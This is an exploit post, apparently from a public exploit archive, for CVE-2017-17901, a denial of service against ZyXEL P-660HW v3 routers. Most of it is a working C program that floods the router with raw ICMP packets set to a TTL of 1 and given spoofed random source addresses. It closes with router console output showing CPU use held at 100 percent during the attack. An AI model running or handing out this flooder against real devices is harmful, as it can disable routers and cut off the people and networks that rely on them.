ZyXEL P-660HW TTL Expiry Denial Of Service

`################  
#Exploit Title: ZyXEL TTL Expiry Denial of Service  
CVE: CVE-2017-17901  
#CWE: CWE-400  
#Exploit Author: Hosein Askari   
#Vendor HomePage: https://www.zyxel.com/  
#Version : v3  
#Tested on: ZyXEL P-660HW  
#Category: Network Appliance  
#Author Mail : [email protected]  
#description: According to RFC 791, the router should destroy any datagram with value of less than or equal to one. ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via  
a flood of IP packets with a TTL of 1.  
#####################  
#include <sys/socket.h>  
#include <stdio.h>  
#include <string.h>  
#include <unistd.h>  
#include <stdlib.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <pwd.h>  
#include <time.h>  
#include <sys/utsname.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <netinet/ip.h>  
#include <netinet/ip_icmp.h>  
#include <netinet/igmp.h>  
void banner(void) {  
  
printf("TTL Expiry ZyXEL\n");  
printf("Author: Hosein Askari");  
}  
void usage(const char *progname) {  
printf("use : ./ZeXEL RouterIP count\n");  
}  
int attack( const char *name, unsigned int port, struct sockaddr_in *addr ) {  
struct hostent *host;  
memset(addr,0,sizeof(struct sockaddr_in));  
addr->sin_family = AF_INET;  
addr->sin_addr.s_addr = inet_addr(name);  
if (addr->sin_addr.s_addr == -1) {  
if (( host = gethostbyname(name) ) == NULL ) {  
fprintf(stderr,"unknown host\n",name);  
return(-1);  
}  
addr->sin_family = host->h_addrtype;  
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);  
}  
addr->sin_port = htons(port);  
return(0);  
}  
unsigned short in_cksum(addr, len)  
u_short *addr;  
int len;  
{  
register int nleft = len;  
register u_short *j = addr;  
register int sum = 0;  
u_short answer = 0;  
while (nleft > 1) {  
sum += *j++;  
nleft -= 2;  
}  
if (nleft == 1) {  
*(u_char *)(&answer) = *(u_char *)j ;  
sum += answer;  
}  
sum = (sum >> 16) + (sum & 0xffff);  
sum += (sum >> 16);   
answer = ~sum;   
return(answer);  
}  
int func(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) {  
unsigned char *packet;  
struct iphdr *ip;  
struct icmphdr *icmp;  
int rc;  
packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);  
ip = (struct iphdr *)packet;  
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));  
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);  
  
ip->ihl = 5;  
ip->version = 4;  
ip->tos = 4;  
ip->id = htons(1234);  
ip->frag_off = htons(0x2000);  
ip->tot_len = 0;  
ip->ttl = 1;  
ip->protocol = IPPROTO_ICMP;  
ip->saddr = rand() % 446674540;  
ip->daddr = dest_addr->sin_addr.s_addr;  
ip->check = in_cksum(ip, sizeof(struct iphdr));  
  
icmp->type = rand() % 18;  
icmp->code = rand() % 15;  
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);  
if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); }  
free(packet);  
return(0);  
}  
int main(int argc, char **argv) {  
struct sockaddr_in dest_addr;  
unsigned int i,sock;  
unsigned long src_addr;  
banner();  
if ((argc != 3)) {  
usage(argv[0]);  
return(-1);  
}  
  
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {  
fprintf(stderr,"run with root privilege\n");  
return(-1);  
}  
src_addr = dest_addr.sin_addr.s_addr;  
if (attack(argv[1],0,&dest_addr) == -1) { return(-1); }  
for (i = 0;i < atoi(argv[2]);i++) {  
if (func(sock,rand() % 4000000,&dest_addr) == -1) {  
fprintf(stderr,"Error\n");  
return(-1);  
}  
}  
  
}  
####################  
ras> sys cpu display  
CPU usage status:  
baseline 2106307 ticks  
sec ticks util sec ticks util sec ticks util sec ticks util  
0 1712258 18.70 1 1730816 17.82 2 1738596 17.45 3 1715513 18.55  
4 1529073 27.40 5 0 100.00 6 0 100.00 7 0 100.00  
8 0 100.00 9 0 100.00 10 177665 91.56 11 1418797 32.64  
12 0 100.00 13 0 100.00 14 0 100.00 15 0 100.00  
16 0 100.00 17 0 100.00 18 0 100.00 19 0 100.00  
20 0 100.00 21 0 100.00 22 0 100.00 23 0 100.00  
24 0 100.00 25 0 100.00 26 0 100.00 27 0 100.00  
28 0 100.00 29 0 100.00 30 0 100.00 31 0 100.00  
32 0 100.00 33 0 100.00 34 0 100.00 35 0 100.00  
36 0 100.00 37 0 100.00 38 0 100.00 39 0 100.00  
40 0 100.00 41 0 100.00 42 0 100.00 43 0 100.00  
44 0 100.00 45 0 100.00 46 0 100.00 47 0 100.00  
48 0 100.00 49 0 100.00 50 0 100.00 51 0 100.00  
52 0 100.00 53 0 100.00 54 0 100.00 55 0 100.00  
56 0 100.00 57 0 100.00 58 0 100.00 59 0 100.00  
60 758577 63.98 61 700450 66.74 62 0 100.00   
  
`